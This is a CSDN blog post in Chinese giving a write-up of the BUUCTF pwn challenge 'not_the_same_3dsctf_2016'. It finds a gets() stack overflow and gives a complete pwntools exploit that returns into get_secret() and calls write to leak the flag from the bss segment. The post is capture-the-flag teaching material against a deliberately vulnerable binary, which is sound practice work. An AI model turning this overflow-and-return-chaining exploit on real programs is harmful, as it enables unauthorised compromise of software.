not_the_same_3dsctf_2016

最新推荐文章于 2023-12-03 16:46:29 发布
最新推荐文章于 2023-12-03 16:46:29 发布
阅读量258 收藏
点赞数
分类专栏: BUU-PWN 文章标签: pwn python CTF 网络安全 WriteUp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/123792723
版权

not_the_same_3dsctf_2016

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行。

放进IDA中分析:
在这里插入图片描述

  • gets(&v4);:存在栈溢出

main()函数上面发现一个get_secret()函数:
在这里插入图片描述
在这里插入图片描述

  • fgets(&fl4g, 45, v0);:将读取到的flag存在了bss段上地址为080ECA2D

题目思路

  • 主函数存在栈溢出,可通过该栈溢出将返回地址覆盖成get_secret()的地址。
  • flag已经读取到bss段中了,可通过write函数将bss段中的flag给打印出来。

步骤解析

无需

完整exp

from pwn import *

#start
r = remote("node4.buuoj.cn",27604)
# r = process("../buu/not_the_same_3dsctf_2016")
elf = ELF("../buu/not_the_same_3dsctf_2016")

#params
flag_func_addr = elf.symbols['get_secret']
flag_addr=0x80ECA2D

#attack
payload=b'M' * 45 + p32(flag_func_addr) + p32(elf.sym['write']) + b'M'*4 + p32(1) + p32(flag_addr) + p32(100)
r.sendline(payload)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vhe.rar_At the Same Time
09-23
标题"vhe.rar_At the Same Time"暗示了我们正在探讨一种能同时处理多个任务的技术,即多线程(Multi-threading)。这种技术允许应用程序在单个进程中创建并运行多个执行线程,使得多个任务可以并行执行,极大地提高...
MATLAB3.rar_Same Same
09-24
描述中的“same file contents as the previously three already uploaded files”进一步确认了这一点,意味着这个压缩包包含的文件可能与之前的版本没有实质性的差异,或许是备份或者是连续工作的不同版本。...
CTF】not_the_same_3dsctf_2016
凉水的博客
01-30 3766
解题思路 1 先反编译,找到mian函数 undefined4 main(void) { char local_2d [45]; printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... "); gets(local_2d); return 0; } 一看到gets,就觉得靠谱了。 2 下一步找可利用函数,构造利用链。随便翻函数列表,没找到system以及/bin/sh,说明没有可以直接获取shell的方法;再继续翻,看到了get_secret函数,以及_
【BUUCTFPWN】not_the_same_3dsctf_2016
m0_55368674的博客
01-12 337
【BUUCTF - PWN】not_the_same_3dsctf_2016题解
not_the_same_3dsctf_2016 wp (python3)
Kata_Jhin的博客
03-14 148
not_the_same_3dsctf_2016 wp (python3)
not_the_same_3dsctf_2016【简单解法和mprotect解法】
qq_41696518的博客
08-29 672
not_the_same_3dsctf_2016,含mprotect解法和常规解法
Check_Same_File.rar_Same Same
09-14
"Check_Same_File.rar_Same Same" 提供了一个解决方案,用于快速有效地检查两个文件的一致性。这个工具或程序可能涉及以下几个关键知识点: 1. **文件比较**:文件比较是检查两个或多个文件内容是否一致的过程。在...
find_same_class.zip_Same Same
09-20
3. **报告生成**:在找出相似类后,脚本可能会生成一个报告,详细列出这些类,指出它们的相似之处,并可能提供合并建议。这对于开发者来说是非常有价值的,因为它能直观地展示哪些类可能需要被重构。 4. **自动化...
msm_iommu.rar_The Number
09-24
描述中提到的“Maximum number of Machine IDs that we are allowing to be mapped to the same context bank”是IOMMU的一个关键参数,它关乎到系统资源的分配和管理。Machine ID通常是指连接到系统的物理设备的...
BUUCTF-not_the_same_3dsctf_2016
Fzuim的博客
03-03 1627
这是一道pwn题目IDA查看伪代码查看编译属性思路1,本地可打通,远程不行思路2,正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击 通过查看字符串列表,发现有个get_secret读取flag.txt后门函数 查看编译属性 思路1,本地可打通,远程不行 也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下 #coding=utf8 from pwn import * context.log_level = 'deb
[BUUCTF]-PWN:not_the_same_3dsctf_2016解析
最新发布
2301_79326813的博客
12-03 413
答:这里跟exit没有太大关系,不是exit也行,但printf和flag_addr的隔一个是printf函数在32位的调用规则,也就是通过栈传参,64位与32位不同,64位是前6个参数通过寄存器传参,因此payload的书写也不同,这个需要注意。答:printf从缓冲区打印出东西需要满足条件,比如有换行符或缓冲区已满或程序退出,如果不满足条件flag无法被打印出来。答:因为这里没有rbp,在main函数的汇编界面就可以看到程序并没有把rbp推入,所以不用覆盖rbp。问题1:为什么填充45个字符?
CTF buuoj pwn-----第11题: not_the_same_3dsctf_2016
bing_Max的博客
09-30 1213
前言 bss是指那些没有初始化的和初始化为0的全局变量 bss类型的全局变量只占运行时的内存空间,而不占文件空间。 data类型的全局变量是既占文件空间,又占用运行时内存空间的。 rodata 的意义同样明显,ro代表read only,即只读数据(const) 在运行过程中不会改变的数据设为 rodata 类型的,是有很多好处的:在多个进程间共享,可以大大提高空间利用率,甚至不占用RAM空间。同时由于 rodata 在只读的内存页面(page)中,是受保护的,任何试图对它的修改都会被及
BUUCTF not_the_same_3dsctf_2016
红叶的博客
10-31 189
本题目本地与远程得用两种方案打。
[BUUCTF-pwn]——not_the_same_3dsctf_2016
Y_peak的博客
02-10 743
not_the_same_3dsctf_2016 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 首先checksec一下,看看32位程序 在IDA中,发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp shift+F12看下,发现了flag.txt这种敏感 字符串 找到调用的函数get_secret函数 函数调用后,flag储存在fl4g里面,我们找到fl4g的位置 找到可以输出的write函数 下面我们就可
buuctf|pwn-not_the_same_3dsctf_2016-wp
l2645470582_的博客
11-08 295
1.检查保护机制 我们看到开了堆的保护 2.用32为的IDA打开该文件 shift+f12查看关键字符串,我们看到有‘flag.txt’关键字符 我们就查找出后门函数的地址:0x080489A0 我们看到读取flag.txt,注意fgets函数,就是在f14g里面读取45个字符,我们猜测这就是flag 3.我们查看main函数里面有什么 我们看到gets(&v4)有个溢出,我们看到v4地址是0x2D 4.rop ...
buu not_the_same_3dsctf_2016
weixin_51298357的博客
01-30 189
buu not_the_same_3dsctf_2016 刚拿到题 刚打开的时候很懵,main函数里只有一个fopen函数和一个fgets函数,点半天也没查到什么。没有办法,shift+f12 :查看程序内的字符串,发现了flag.txt 双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置。我们找到了flag的位置。接下来就要尝试把它读取出来就好了。 到这里,结合一开始看见的gets函数,得到了第一个思路:利用gets函数覆盖返回地址去
write_name_nets_same_as_ports
07-28
在综合设计时,可以使用write_name_nets_same_as_ports命令来将网名与端口名保持一致。这个命令的作用是在生成的网表文件中,将每个信号的名称与其对应的端口名称相同。这样做的好处是可以提高设计的可读性和可维护性,方便后续的布局布线和时序分析工作。使用这个命令可以确保在综合后的网表文件中,每个信号的名称都与其对应的端口名称一致。这样在后续的设计流程中,可以更方便地进行信号的追踪和分析。\[1\] #### 引用[.reference_title] - *1* *3* [DC综合——学习笔记](https://blog.csdn.net/zgezi/article/details/107830443)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [数字电路设计入门(fpga/asic)](https://blog.csdn.net/Augusdi/article/details/105150815)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值